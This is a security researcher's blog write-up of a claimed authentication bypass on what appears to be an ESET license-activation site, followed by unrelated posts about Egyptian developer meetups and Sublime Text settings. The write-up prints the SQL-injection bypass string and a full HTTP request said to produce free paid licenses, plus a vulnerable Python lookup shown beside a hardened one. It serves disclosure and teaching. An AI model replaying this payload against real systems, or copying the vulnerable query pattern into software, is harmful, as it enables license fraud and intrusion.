A Hilarious ESET Broken Authentication Vulnerability (one click free purchase)


Hello Geeks and Security Evangelists,

My name is Mohamed Abdelbaset Elnoby, just another Senior Information Security Researcher and Web Application Pentester in the world 😀. Today I would like to show you a “hilarious” Broken Authentication bug I found in the ESET website, specifically in their “Antivirus Product Activation Process”, that allowed me to generate millions of valid paid licenses of “ESET Nod32 Antivirus” (as per their description, “Our award-winning security software offers the most effective protection available today”) for free.
(Yes, “hilarious” is in bold; it’s not a formatting mistake, but you will know why at the end of the story.)


What is Broken Authentication?!

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.

In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:

  • In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
  • In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
  • In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack of the required technical skills or due to the lack of good documentation.


Black Box testing:

There are several methods of bypassing the authentication schema that is used by a web application:

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection


Here are the in-depth details:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--


Result!!

Each time you send the above request with the bypass string, guess what?! You will receive a free paid license of ESET Nod32 valid for 1 year!! (Actually the yearly subscription costs $29.00 per user/request.)


[*] Proof of Concept Video:


What to do?!

All I needed to do was create a detailed report and address this “catastrophic” bug under their Responsible Disclosure rules, which I already did. But what is the previously mentioned “hilarious” thing here?!! :v

[*] Screenshots are louder than speech 😀

[Screenshot #1]

[Screenshot #2]

Behind the Scene!!

As this is black-box testing and there is nothing interesting printed out as output, I can’t even predict what was happening in the back-end, but it’s a good thing at least for a bug hunter 😀. Assuming that this is maybe a fully blind SQL injection, an authentication bypass or even a broken authentication issue (the last one is the more realistic one), what I’m sure of is that in a parallel world there is a programmer having a lot of beer while handling the “if statement checks, input filtering and database querying”, and he got drunk enough to be trapped by my bypass.


[*] Nothing to be said here, but rules are rules and must be respected. Thanks Daniel, but I will keep my sense of humor for my CV 😀

Conclusion…

For my dear programmer friends: don’t trust user-supplied input, “filter all the things”, stored procedures are safer, RTFM, and finally don’t drink beer while coding. Peace. 😀
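To make the guesswork in “Behind the Scene” and the advice above concrete, here is an added illustration that is not the author’s code and not ESET’s backend (which the post itself says was never visible): a hypothetical activation lookup in Python/SQLite. It assumes the submitted key lands inside a LIKE clause, one backend shape in which exactly the bypass string from the request dump turns the check into an always-true predicate, and it shows the hardened form beside it: allow-list the key format and bind the value as a parameter (the AAAA-BBBB-… key pattern and the sample license row are constructed placeholders, not real ESET data).

```python
import re
import sqlite3

# Constructed sample data: a toy activation database holding one paid license.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE licenses (serial TEXT PRIMARY KEY, product TEXT, days INTEGER)")
    conn.execute("INSERT INTO licenses VALUES ('AAAA-BBBB-CCCC-DDDD-EEEE', 'NOD32', 365)")
    conn.commit()
    return conn

def lookup_vulnerable(conn, serial):
    """Hypothetical vulnerable lookup: the user-supplied key is pasted into the SQL text.
    With the bypass string  ' OR '''  the WHERE clause becomes
        serial LIKE '%' OR '''%'
    i.e. "matches anything" OR the literal string '%, so every row qualifies and the
    first license in the table is handed out regardless of what was typed."""
    sql = "SELECT serial, product, days FROM licenses WHERE serial LIKE '%" + serial + "%'"
    return conn.execute(sql).fetchone()

# Assumed key format (placeholder): five groups of four alphanumerics, dash-separated.
SERIAL_RE = re.compile(r"^[A-Z0-9]{4}(-[A-Z0-9]{4}){4}$")

def lookup_hardened(conn, serial):
    """Hardened lookup: reject anything that is not a well-formed key, then bind the
    value as a query parameter so the database never parses it as SQL. Only an exact
    match on the stored serial yields a license."""
    if not SERIAL_RE.fullmatch(serial):
        return None
    return conn.execute(
        "SELECT serial, product, days FROM licenses WHERE serial = ?", (serial,)
    ).fetchone()

def demo():
    """Run both lookups against the bypass string and against a genuine key."""
    conn = make_db()
    payload = "' OR '''"  # the bypass string from the request dump
    return {
        "vuln_payload": lookup_vulnerable(conn, payload),   # license leaks
        "hard_payload": lookup_hardened(conn, payload),     # None: rejected
        "hard_valid": lookup_hardened(conn, "AAAA-BBBB-CCCC-DDDD-EEEE"),
    }

if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```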

[**Update**]

ESET dismissed my report as invalid (“after it had been accepted and rewarded #badass_logic”) because the reported backend “eu-eset.com” is a phishing website.

The screenshot below reflects the confusion that ESET’s experts were suffering from during the report.

So if that’s really true, and let’s argue that it is, then:
1. Kudos to me that I discovered a vulnerability in a website built by people who were good at “something”, arguably “phishing”, and still kicked ESET’s ass by generating valid licenses.
2. More shame on ESET: they were being fucked by this “phishing website” until the moment I reported it, because that “phishing website” is generating, “via my bypass”, an actual paid valid license of their “award-winning product” for free. Here’s another proof of what I’m saying here:


Have a good day, Gentlemen

References:

OWASP: Broken Authentication and Session Management
OWASP Top 10 2013 – A2: Broken Authentication and Session Management
OWASP Testing Guide: Testing for Bypassing Authentication Schema


The weekly meeting with the deputy of the Egyptian Programmers Union

Today we had the honor of talking with the representatives of the Egyptian Programmers Union, and we had a very interesting discussion about the challenges and benefits for developers, like retirement plans, privacy, how to encourage investment in IT in Egypt, how to secure the programmer career and much more…


For more information: https://www.facebook.com/groups/egyptian.geeks/

Programming and Development for non-tech people

Today we are talking about a very important subject: how to become a programmer, for non-technical people in Egypt.

My Sublime text 2 User Settings

Here I’m sharing my Sublime Text 2 user settings, because Sublime Text 2 is now one of the most popular IDEs after VIM for Ruby/JavaScript developers, it’s getting more awesome every day, and the unlimited number of helpful plugins makes it very flexible.

Sublime Text 2 User Settings

{
	"auto_complete_commit_on_tab": true,
	"color_scheme": "Packages/Theme - Flatland/Flatland Monokai.tmTheme",
	"detect_indentation": true,
	"draw_indent_guides": true,
	"draw_white_space": "all",
	"file_exclude_patterns":
	[
		".DS_Store"
	],
	"find_selected_text": true,
	"flatland_square_tabs": true,
	"folder_exclude_patterns":
	[
		".git",
		".bundle",
		".rbx"
	],
	"font_face": "Inconsolata",
	"font_options":
	[
		"directwrite"
	],
	"font_size": 10,
	"highlight_line": true,
	"ignored_packages":
	[
	],
	"new_window_settings":
	{
		"hide_open_files": true,
		"show_minimap": true,
		"show_tabs": true,
		"side_bar_visible": true,
		"status_bar_visible": true
	},
	"tab_size": 2,
	"theme": "Flatland Dark.sublime-theme",
	"translate_tabs_to_spaces": true,
	"trim_trailing_white_space_on_save": true,
	"use_simple_full_screen": true,
	"vintage_start_in_command_mode": true,
	"word_wrap": true
}

Sublime Text 2 User Settings Screenshot

Please try it and share yours with us.

Cloud Computing

In this week’s meeting we are discussing cloud computing platforms, the pros and cons, and the challenges that face developers when they are developing cloud computing systems.

We discuss all the cloud computing services, like Amazon S3 and Rackspace.

How to be a Professional Developer

In this weekly hangout we are discussing how to become a professional developer and the difference between coding at your university and coding in the real world.

This video is targeted mainly at Computer Science students in Egypt and how to prepare for your professional career.

02 – Software Estimation

This week we are discussing the software estimation issue and how to minimize the risk you can face in the process of making your time estimation.

01 – Prototyping

In our first Egyptian Geeks online meeting we talked about prototyping, tested our presence, and initiated our weekly hangout/meeting and workshops.